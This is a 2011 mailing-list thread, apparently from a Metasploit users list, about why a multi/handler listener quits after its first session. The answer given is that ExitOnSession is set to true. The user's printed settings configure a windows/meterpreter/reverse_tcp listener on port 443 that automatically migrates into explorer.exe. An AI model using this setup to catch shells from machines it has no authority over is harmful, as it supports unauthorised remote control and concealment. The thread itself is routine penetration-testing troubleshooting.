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Re: multi handler crash after first session connection

From: r00m_213 <r00m213 () gmail com>
Date: Wed, 10 Aug 2011 17:05:11 +0200

Hi Rob,

Tried luck.


r00m 213

On Wed, Aug 10, 2011 at 4:42 PM, Rob Fuller <mubix () room362 com> wrote:

"  ExitOnSession          true"

^ the cause of your problem

Rob Fuller | Mubix
Certified Checkbox Unchecker |

On Wed, Aug 10, 2011 at 10:25 AM, r00m_213 <r00m213 () gmail com> wrote:

Hi guys,

I am running several machines with BT4 and MSF

On the first I am using BT4 and MSF v3.6.0-dev.11421
On the second I am using BT4 and MSF v3.8.0-dev.12541
On the third I am using BT4 and MSF v4.0.1.13502

I use a payload on the remote box that spawns a reverse tcp connection

On the Local machine I use

    > use exploit/multi/handler

The settings are the same on all 3 machines


  Name           Value
  ----           -----
  AutoRunScript  migrate explorer.exe
  LHOST          X.X.X.X
  LPORT          443
  PAYLOAD        windows/meterpreter/reverse_tcp

Module: multi/handler

  Name                   Value
  ----                   -----
  AutoLoadStdapi         true
  AutoRunScript          migrate explorer.exe
  AutoSystemInfo         true
  DisablePayloadHandler  false
  EXITFUNC               process
  EnableContextEncoding  false
  EnableUnicodeEncoding  true
  ExitOnSession          true
  LHOST                  X.X.X.X
  LPORT                  443
  ListenerTimeout        0
  ReverseConnectRetries  5
  TARGET                 0
  VERBOSE                false
  WfsDelay               0

exploit -j

The strange thing is that I can get multiple sessions with
The other two (v3.8.0-dev.12541 and v4.0.1.13502) I get a session once,
then it kills the process, so no listening on port 443 anymore.

Any help is appreciated


r00m 213



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